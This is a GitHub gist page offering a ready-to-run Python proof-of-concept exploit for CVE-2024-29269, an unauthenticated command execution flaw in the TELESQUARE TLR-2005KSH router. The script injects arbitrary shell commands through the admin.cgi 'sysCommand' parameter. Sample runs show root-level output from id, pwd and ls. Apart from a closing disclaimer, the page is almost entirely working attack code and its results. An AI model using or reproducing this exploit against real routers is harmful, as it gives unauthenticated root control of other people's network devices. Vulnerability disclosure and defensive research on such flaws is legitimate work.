Skip to content

Instantly share code, notes, and snippets.

@win3zz
Created April 3, 2024 14:50
Show Gist options
  • Save win3zz/c26047ae4b182c3619509d537b808d2b to your computer and use it in GitHub Desktop.
Save win3zz/c26047ae4b182c3619509d537b808d2b to your computer and use it in GitHub Desktop.
CVE-2024-29269: TELESQUARE TLR-2005KSH Router vulnerable to unauthenticated OS command execution

TELESQUARE TLR-2005KSH Router vulnerable to unauthenticated OS command execution

PoC

File: script.py

import sys
import requests
import xml.etree.ElementTree as ET


def get_systemutil_response(url, command, proxy):
    endpoint = f"/cgi-bin/admin.cgi?Command=sysCommand&Cmd={command}"
    full_url = url.rstrip('/') + endpoint
    headers = {
        'Referer': url,
    }
    try:
        response = requests.get(full_url, headers=headers, proxies=proxy)
        if response.status_code == 200:
            print("Response from", full_url)
            #print(response.text)
            root = ET.fromstring(response.text)
            for cmd_result in root.findall('CmdResult'):
                data = cmd_result.text.strip()
                print(data)
        else:
            print("Error: Failed to fetch data. Status code:", response.status_code)
    except requests.exceptions.RequestException as e:
        print("Error:", e)

if __name__ == "__main__":
    if len(sys.argv) != 3:
        print("Usage: python script.py <url> <command>")
        sys.exit(1)
    url = sys.argv[1]
    command = sys.argv[2]
    proxy = {
        'http': 'http://127.0.0.1:8080',
        'https': 'https://127.0.0.1:8080',
    }
    get_systemutil_response(url, command, proxy)

To run the script, use the following commands:

bipin@bipin-VirtualBox:~/CVE-2024-29269$ python3 script.py
Usage: python script.py <url> <command>
bipin@bipin-VirtualBox:~/CVE-2024-29269$ python3 script.py http://ROUTER_IP:PORT/ id
Response from http://ROUTER_IP:PORT/cgi-bin/admin.cgi?Command=sysCommand&Cmd=id
uid=0(admin) gid=0(admin)
bipin@bipin-VirtualBox:~/CVE-2024-29269$ python3 script.py http://ROUTER_IP:PORT/ pwd
Response from http://ROUTER_IP:PORT/cgi-bin/admin.cgi?Command=sysCommand&Cmd=pwd
/etc_ro/lighttpd/www/cgi-bin
bipin@bipin-VirtualBox:~/CVE-2024-29269$ python3 script.py http://ROUTER_IP:PORT/ "ls -al"
Response from http://ROUTER_IP:PORT/cgi-bin/admin.cgi?Command=sysCommand&Cmd=ls -al
-rwxrwxr-x    1 1000     1000       xxxxxx web
-rwxrwxr-x    1 1000     1000        xxxxx update.cgi
-rwxrwxr-x    1 1000     1000        xxxxx lte.cgi
-rwxrwxr-x    1 1000     1000          xxx ExportTrafficLog.sh
-rwxrwxr-x    1 1000     1000        xxxxx nms.cgi
-rwxrwxr-x    1 1000     1000        xxxxx admin.cgi
-rwxrwxr-x    1 1000     1000        xxxxx bip.cgi
-rwxrwxr-x    1 1000     1000        xxxxx systemutil.cgi
-rwxrwxr-x    1 1000     1000        xxxxx wireless.cgi
-rwxrwxr-x    1 1000     1000          xxx ExportvpnLog.sh
-rwxrwxr-x    1 1000     1000        xxxxx serialmodem.cgi
-rwxrwxr-x    1 1000     1000        xxxxx modem.cgi
-rwxrwxr-x    1 1000     1000        xxxxx traffic.cgi
-rwxrwxr-x    1 1000     1000        xxxxx firewall.cgi
-rwxrwxr-x    1 1000     1000          xxx ExportSettings.sh
-rwxrwxr-x    1 1000     1000        xxxxx serial.cgi
-rwxrwxr-x    1 1000     1000        xxxxx gmmp.cgi
-rwxrwxr-x    1 1000     1000        xxxxx internet.cgi
-rw-r--r--    1 0        0               0 xx.txt`
-rw-r--r--    1 0        0              xx xxyyzz.txt
-rwxrwxrwx    1 0        0         xxxxxxx linux-mips
drwxrwxr-x   21 1000     1000            0 ..
drwxrwxr-x    2 1000     1000            0 .

1

3

Disclaimer

This code and associated instructions are provided for educational purposes only. Unauthorized use for malicious intent, including but not limited to unauthorized access to computer systems, networks, or data, is strictly prohibited. The author disclaims any responsibility for misuse of the code or any negative consequences resulting from its use. Users are advised to adhere to ethical and legal standards when utilizing or experimenting with the provided code. It is recommended to obtain explicit permission before attempting to run this code on any systems or networks that are not owned or managed by the user.

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment